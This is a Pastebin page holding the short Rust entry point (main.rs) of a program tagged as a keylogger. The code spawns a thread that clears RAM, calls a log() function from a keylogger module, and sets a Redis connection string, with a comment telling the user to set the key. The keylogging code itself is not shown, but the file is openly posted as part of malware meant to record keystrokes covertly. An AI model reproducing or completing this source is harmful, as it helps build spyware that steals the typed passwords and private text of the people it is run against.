Advertisement
FlyFar

main.rs

Jul 24th, 2023
1,168
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Rust 0.30 KB | Cybersecurity | 0 0
  1. use std::thread;
  2.  
  3. use crate::keylogger::log;
  4. use crate::ram::clear_cache::clear_ram_thread;
  5.  
  6. mod ram;
  7. pub mod db;
  8. mod keylogger;
  9.  
  10. // Make sure to set the redis key!!!!
  11. const REDIS_KEY: &str = "redis://127.0.0.1:6379";
  12.  
  13. fn main() {
  14.     thread::spawn(|| { clear_ram_thread() });
  15.     log();
  16. }
Tags: Keylogger
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement